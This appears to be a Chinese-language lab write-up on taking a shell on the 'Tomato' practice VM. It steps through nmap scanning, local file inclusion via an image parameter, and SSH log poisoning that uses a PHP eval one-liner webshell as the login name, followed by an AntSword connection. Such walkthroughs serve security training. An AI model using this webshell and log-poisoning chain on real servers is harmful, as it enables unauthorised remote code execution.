首页 > 系统相关 >Tomato靶机拿取shell

Tomato靶机拿取shell

时间:2024-11-05 19:47:24浏览次数:3  
标签:Tomato 文件 shell log url 拿取 ssh allow var

1.扫主机

arp-scan -I eth0 -l

2.扫端口

nmap -A -p- -sS -T4 --min-rate=10000 192.168.163.155

3.扫目录

发现dirsearch 扫不到,可以换dirb扫一下

4.挨个目录看一眼

5.最后在目录下的info.php有phpinfo信息

发现allow_url_fopenallow_url_include处于一开一闭状态

allow_url_fopen: 代表这个选项决定是否允许 PHP 使用文件函数,通过url能否直接访问文件。当该选项设置为 On 时,PHP 可以通过 URL(例如 http://https://)直接访问文件;当设置为 Off 时,则只能访问本地文件。

allow_url_include: 专门用于包括远程文件。具体来说,当该选项设置为 On 时,你可以使用 includerequire 函数从远程 URL 包含文件;当设置为 Off 时,则不允许这样做。由于安全原因,通常不推荐开启这个选项。

6.右键查看源码,可以发现可以通过拼接?image=‘/x/x’来访问文件

7.访问成功,证明漏洞存在

8.使用burp爆破,查看有哪些日志文件是可以访问到的

/var/log/syslog
/var/log/messages
/var/log/auth.log
/var/log/dmesg
/var/log/apache2/
/var/log/httpd/
/var/log/mysql/
/var/log/nginx/
/var/log/samba/
/var/log/maillog
/var/log/mail.log
/var/log/boot.log
/var/log/cron

9.由前边的端口扫描发现,2211对应的是ssh,我们可以用同一网段的主机,我这里用的是centos7,对其进行ssh连接,留下痕迹

ssh [email protected] -p 2211

10.我们的用户名是可以传上去的,那我们可以把用户名换成一句话木马,应该也是能传上去

ssh '<?php @eval($_POST[1]);?>'@192.168.163.155 -p 2211

11.这里虽然看不见名字,但看不见才是正常的,说明木马被解析了,那我们直接拿着url去蚁剑连接就行

标签:Tomato,文件,shell,log,url,拿取,ssh,allow,var
From: https://blog.csdn.net/m0_71102905/article/details/143515138

相关文章

  • 【保姆级教程】使用 oh-my-posh 和 clink 打造个性化 PowerShell 和 CMD
    内容预览≧∀≦ゞ终端美化指南——oh-my-posh和clink篇引言一、准备工作默认终端:WindowsTerminal离线安装步骤包管理器:scoop为什么选择使用Scoop安装?scoop安装scoop常用命令字体下载二、配置WindowsTerminal三、配置oh-my-posh安装激活oh-my-posh编辑P......
  • 用Powershell控制指定进程窗口的位置和大小
    用Powershell控制CMD窗口的位置和大小我想控制下面这段bat代码执行时,窗口的位置和大小,里面其实是ps代码,存成bat格式#@&cls&powershell"type'%~0'|out-string|iex"&pause&exit"hello,world"cmd/cpauseCOPY我在国外找到了一个ps函数,他可以控制某个窗口的位置和大小,......
  • Linux,shell基础,变量,数值运算
    linux一.shell基础1.什么是shell在linux内核与用户之间的解释器程序,通常指/bin/bash2.shell的使用方式1.交互式2.非交互式3.Bash基本特征1.快捷键2.历史命令3.重定向4.管道5.别名......
  • 在 Windows Server 2025 中,可以使用 PowerShell 来启用一些功能和功能组件。要开启“
    在WindowsServer2025中,可以使用PowerShell来启用一些功能和功能组件。要开启“优质的音频体验”、“媒体基础”、“增强的存储”和“DirectPlay”,可以使用以下步骤:打开PowerShell以管理员身份:右键单击开始菜单,选择“WindowsPowerShell(管理员)”。启用相关功......
  • 【网络云计算】2024第45周小测第1次-Shell编程类
    文章目录1.1、CentOSStream9系统初始化的流程和步骤,步骤和指令对应,编写Shell脚本,并添加注释1.2、写出你所知道的所有的Shell编程的基本语法【网络云计算】2024第45周小测第1次-Shell编程类1.1、CentOSStream9系统初始化的流程和步骤,步骤和指令对应,编写Shell脚本......
  • 常见的100个Shell命令(非常详细)零基础入门到精通,收藏这一篇就够了
    在大多数的Linux和Unix系统、及其他类Unix系统中,Shell是用户与操作系统内核交互的主要方式。作为一种强大的命令行解释器,它也支持编程功能,用户可以写脚本来处理各种任务。熟悉shell脚本,首先要对shell指令熟悉,今天就简单介绍常用的**100个Shell命令**,希望对你有所帮助!【文......
  • Spark Streaming监听HDFS文件(Spark-shell)
    需求:编写程序利用SparkStreaming监控HDFS 目录/input目录下的文件,并对上传的文件进行词频统计。首先,linux中需要有netcat,来实现监听功能,有的linux会自带这个软件,可以用下面的命令测试一下,如果不报错就没问题,Ctrl+z可以退出nc-l9999没有netcat的可以用这个来下载,如果......
  • Linux-shell实例手册-磁盘
    本文主要介绍在Linux下关于磁盘的操作,如磁盘常用命令、创建swap文件方法,磁盘挂载,raid原理等。记得点赞,收藏方便随时查看。文章目录1磁盘常用Linux命令2 创建swap文件方法3 新硬盘挂载4raid原理与区别1磁盘常用Linux命令  df-Ph             ......
  • 宝塔安装shell脚本-仅支持debian系
    #!/bin/bashPATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/binexportPATHLANG=en_US.UTF-8INSTALL_LOGFILE="/tmp/btpanel-install.log"#exec>>(tee-a"$INSTALL_LOGFILE")2>&1Btapi_Url='http......
  • 【shell脚本】将Shell脚本转换为Systemd服务:轻松实现自动化管理
    原创青菜浪人背景介绍从Ubuntu17.10开始,/etc/rc.local文件不再默认存在于系统中,因为systemd已成为主要的初始化系统。如果需要在系统启动时自动执行某些命令,可以通过编写Shell脚本并将其封装为一个systemd服务来实现这一操作。实现方法这里以一个简单的脚本为例,......